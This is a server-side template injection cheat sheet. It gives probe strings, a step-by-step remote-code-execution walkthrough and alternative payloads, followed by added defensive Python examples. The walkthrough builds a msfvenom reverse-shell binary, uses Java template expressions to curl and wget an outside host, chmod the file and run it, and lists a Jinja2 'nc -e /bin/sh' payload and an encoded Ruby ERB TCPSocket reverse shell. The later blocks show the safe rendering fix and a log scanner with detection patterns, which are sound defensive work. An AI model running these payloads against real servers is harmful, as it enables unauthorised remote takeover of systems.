
Server-Side Template Injection (SSTI)

Tags: SSTI, Web, RCE, Jinja2, Template Engines

Payload Box - SSTI Payloads

Common Test Cases

{7*7}

{{7*7}}

a{{bar}}b

{var} ${var} {{var}} <%var%> [% var %]
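Why these probes work, shown from the application side. The block below is an added example and is not code from the original post or from any project it references: it puts the vulnerable Jinja2 pattern (user input spliced into the template source) next to the fixed pattern (user input passed as a render-time variable) and shows what the {{7*7}} and a{{bar}}b test cases return in each. The template text, function names and the jinja2 package requirement are assumptions of this example.

```python
# Added example: the Jinja2 code path that makes the {{7*7}} probe meaningful,
# beside the fix. Not part of the original post. Requires the jinja2 package.
try:
    from jinja2 import Environment
    HAVE_JINJA2 = True
except ImportError:  # without jinja2 the render functions below raise NameError
    HAVE_JINJA2 = False

# Static template written by the developer (assumed for this example).
GREETING_TEMPLATE = "Hello, {{ name }}!"


def render_vulnerable(user_input: str) -> str:
    """Vulnerable pattern: user input becomes part of the template SOURCE,
    so any template syntax it contains is parsed and evaluated."""
    env = Environment(autoescape=True)  # autoescape does not help here
    return env.from_string("Hello, " + user_input + "!").render()


def render_safe(user_input: str) -> str:
    """Fixed pattern: the template is a constant; user input is supplied as a
    render-time VARIABLE and is only ever treated as data, never parsed."""
    env = Environment(autoescape=True)
    return env.from_string(GREETING_TEMPLATE).render(name=user_input)


def probe_evaluated(user_input: str, rendered: str) -> bool:
    """The check behind the test cases above: if the value we sent does not
    come back verbatim, the engine interpreted it as template syntax."""
    return user_input not in rendered


if __name__ == "__main__" and HAVE_JINJA2:
    for probe in ("{{7*7}}", "a{{bar}}b", "alice"):
        print(f"{probe!r:14} vulnerable -> {render_vulnerable(probe)!r:18}"
              f" safe -> {render_safe(probe)!r}")
```

In the vulnerable version {{7*7}} renders as 49 and a{{bar}}b collapses to ab (the undefined variable renders as an empty string); in the fixed version both come back unchanged. The fix is passing input as data; a sandboxed environment is only a second layer on top of that.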

Example Attack Overview

Step 1: Start Local Server

python3 -m http.server 80

Step 2: Test Remote Connectivity (Java)

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://ip")}

Step 3: Create Reverse Shell Payload

msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=5010 -f elf > r.elf

nc -lvnp 443

Step 4: Perform SSTI for RCE

Download payload:

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("wget 10.5.0.2:5003/r.elf")}

Make executable:

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("chmod 777 ./r.elf")}

Execute:

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("./r.elf")}

Alternative Payloads

Python/Jinja2 (os.system):

*{os.system("nc -e /bin/sh ip 5010")}

Ruby ERB:

<%=system("ruby%20-rsocket%20-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22IP%22%2C5007%29%29%27")%>
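Spotting the steps above in web server logs. Every payload on this page, from the connectivity test to the ERB variant, arrives inside one of the delimiter pairs listed under Common Test Cases, and the ERB payload shows they often arrive percent-encoded. The block below is an added example, not code from the original post or from sstimap: it decodes the request target of each access-log line and flags parameter values (or path segments) that carry a template expression. The log lines are constructed, the family labels are a hypothetical grouping for reporting, and the log format is assumed to be Apache/nginx combined.

```python
# Added example: flag template-expression probes in access-log request targets.
# Not part of the original post. Sample log lines below are constructed.
from __future__ import annotations
import re
import urllib.parse
from dataclasses import dataclass

# Delimiter families from the Common Test Cases list. Labels are a hypothetical
# grouping for reporting, not an exact engine fingerprint.
PROBE_PATTERNS = [
    ("jinja2/twig/mustache", re.compile(r"\{\{.+?\}\}")),      # {{ ... }}
    ("freemarker/velocity/spel", re.compile(r"[$#*]\{.+?\}")),  # ${ } #{ } *{ }
    ("erb/jsp", re.compile(r"<%.+?%>")),                       # <% ... %>
    ("template-toolkit", re.compile(r"\[%.+?%\]")),            # [% ... %]
    # Single-brace {7*7}: only flag when an arithmetic probe is inside, so that
    # ordinary JSON such as {"a":1} in a query string is not reported.
    ("smarty/single-brace", re.compile(r"(?<![{$#*])\{[^{}]*\d\s*[*+/-]\s*\d[^{}]*\}")),
]

# "GET /path?x=y HTTP/1.1" in a combined-format line (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


@dataclass(frozen=True)
class Finding:
    client: str
    param: str       # parameter name, or "<path>" when found in the path
    family: str
    expression: str


def candidate_values(target: str) -> list[tuple[str, str]]:
    """Split a request target into (location, decoded value) pairs to inspect.
    Decoding first is the important part: the ERB payload above is URL-encoded."""
    parsed = urllib.parse.urlsplit(target)
    values = [("<path>", urllib.parse.unquote(parsed.path))]
    for name, vals in urllib.parse.parse_qs(parsed.query, keep_blank_values=True).items():
        values.extend((name, v) for v in vals)
    return values


def scan_line(line: str) -> list[Finding]:
    """Return one Finding per template expression found in a single log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    client = line.split(" ", 1)[0]
    findings = []
    for location, value in candidate_values(m.group("target")):
        for family, pattern in PROBE_PATTERNS:
            for hit in pattern.findall(value):
                findings.append(Finding(client, location, family, hit))
    return findings


def scan_log(lines: list[str]) -> list[Finding]:
    return [f for line in lines for f in scan_line(line)]


# Constructed sample lines: three arithmetic probes, one normal value, one JSON value.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /greet?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 9',
    '10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /greet?name=alice HTTP/1.1" 200 12',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=%24%7B7*7%7D HTTP/1.1" 200 9',
    '10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /page?tpl=%3C%25%3D7*7%25%3E HTTP/1.1" 200 9',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /api?json=%7B%22a%22%3A1%7D HTTP/1.1" 200 8',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.client:10} {f.param:8} {f.family:26} {f.expression}")
```

A match is a reason to look at the response: the probe only mattered if the reply contains 49 rather than the echoed expression. Pair this with the application-side fix (render user input as data, never as template source); the log check catches probing, it does not remove the vulnerability.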

Tools

  • sstimap - Automated SSTI detection and exploitation